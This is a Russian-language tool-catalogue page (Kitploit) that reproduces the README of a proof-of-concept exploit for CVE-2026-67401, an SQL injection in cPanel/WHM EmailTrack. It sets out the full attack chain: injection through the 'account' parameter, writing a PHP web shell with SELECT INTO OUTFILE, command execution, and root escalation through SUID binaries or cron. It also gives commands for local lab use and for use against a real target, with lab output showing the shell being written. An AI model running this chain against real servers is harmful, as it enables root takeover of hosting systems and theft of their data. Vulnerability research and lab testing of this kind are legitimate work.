Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-67401 — Proof-of-concept для CVE-2026-67401 — SQL-инъекция в cPanel/WHM EmailTrack, позволяющая произвольную запись файлов и RCE с правами root, с пробами для обнаружения SQLi и самодостаточной уязвимой лабораторией. | Kitploit
Инструменты/GitHubGitHub/imbas007/cve-2026-67401
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Proof-of-concept для CVE-2026-67401 — SQL-инъекция в cPanel/WHM EmailTrack, позволяющая произвольную запись файлов и RCE с правами root, с пробами для обнаружения SQLi и самодостаточной уязвимой лабораторией.

3 ч 58 мин назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-67401 — SQL-инъекция в EmailTrack cPanel/WHM → RCE с правами root

CVE Severity Platform Python

Proof-of-concept для CVE-2026-67401 — критической уязвимости SQL-инъекции в функциональности EmailTrack cPanel & WHM, позволяющей аутентифицированному пользователю с привилегиями, связанными с почтой, записывать произвольные файлы и выполнять код с правами root.

Обнаружено: Ali Mustafa Раскрыто: 8 сентября 2026 г. Компонент: EmailTrack (логирование / отслеживание доставки почты)


Уязвимые версии

Уязвимы версии ниже исправленных сборок.

Серия сборок cPanelИсправленная версия
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Проверить свою версию можно командой:

root@kitploit:~
cat /usr/local/cpanel/version

Цепочка эксплуатации

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. Аутентифицируйтесь в cPanel с учётной записью, имеющей привилегии на почту.
  2. Внедрите инъекцию через параметр account в EmailTrack.
  3. Запишите PHP-веб-шелл с помощью SELECT ... INTO OUTFILE в public_html/.
  4. Выполните команды через шелл.
  5. Повысьте привилегии через SUID-бинарники cPanel, cron или очередь задач.

Содержимое репозитория

ФайлОписание
poc_sqli.pyОбнаружение SQL-инъекции: boolean-based, time-based и подсчёт столбцов через UNION
poc_full_chain.pyПолная цепочка эксплуатации: SQLi → веб-шелл через INTO OUTFILE → RCE → рекомендации по получению root
lab/vuln_server.pyЛокальная симуляция уязвимого бэкенда EmailTrack (безопасная, самодостаточная)
README.mdЭтот документ

Входящая в комплект лаборатория позволяет запустить и проверить всю цепочку без реального сервера cPanel.


Требования

  • Python 3.8+
  • Сторонние пакеты не требуются — всё использует стандартную библиотеку.

Использование

Все команды выполняются из корня репозитория.

1. Запуск локальной лаборатории

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • Учётные данные: alice / s3cr1t
  • Эмулирует: вход через UAPI, уязвимый запрос EmailTrack, SLEEP(), INTO OUTFILE и выполнение PHP-веб-шелла.
  • Аргумент 1: порт (по умолчанию 18123)
  • Аргумент 2: корень документов (по умолчанию lab/htdocs)

Оставьте это работать в одном терминале и используйте второй терминал для PoC.

2. Обнаружение SQL-инъекции

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
АргументОписание
-H, --hostХост cPanel, например https://cp.example.com:2083
-u, --usernameУчётная запись cPanel с привилегиями на почту
-p, --passwordПароль учётной записи
--paramИнъецируемый параметр (по умолчанию: account)
--modedetect (по умолчанию), boolean, timing, union или all
--sleepДлительность SLEEP() для time-based проверки (по умолчанию: 3.0)
--dump-versionПопытаться извлечь версию СУБД через UNION
--insecureПропустить проверку TLS-сертификата

Запуск конкретной проверки:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Полная цепочка эксплуатации

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Аргумент / переменная окруженияОписание
host (позиционный)Хост cPanel или переменная окружения CPANEL_HOST
CPANEL_USERУчётная запись cPanel с привилегиями на почту
CPANEL_PASSПароль учётной записи
--shell-baseБазовый URL, обслуживающий public_html (где доступен веб-шелл)
--insecureПропустить проверку TLS-сертификата
--no-escalateОстановиться после RCE; пропустить рекомендации по получению root
SHELL_NAME (переменная окружения)Имя файла веб-шелла (по умолчанию: .mail.cache.php)

Этапы, выполняемые автоматически:

  1. Аутентификация в cPanel
  2. Подтверждение SQL-инъекции (boolean + time-based)
  3. Определение количества столбцов в запросе через UNION
  4. Запись PHP-веб-шелла с помощью SELECT ... INTO OUTFILE
  5. Выполнение команд через шелл (id, whoami, перечисление SUID, …)
  6. Вывод рекомендаций по получению root (SUID whmapi1, cron, очередь задач)

4. Против реальной цели

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Примечание: значение --shell-base по умолчанию удаляет из хоста порт, используемый только cPanel (2082/2083). Если корень документов обслуживается на другом порту, укажите его явно.


Проверенные результаты

Вывод, полученный на входящей в комплект лаборатории:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Ссылки

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Лицензия

Выпущено в образовательных целях и для авторизованных исследований в области безопасности. Перед использованием см. Отказ от ответственности.

Скачать инструмент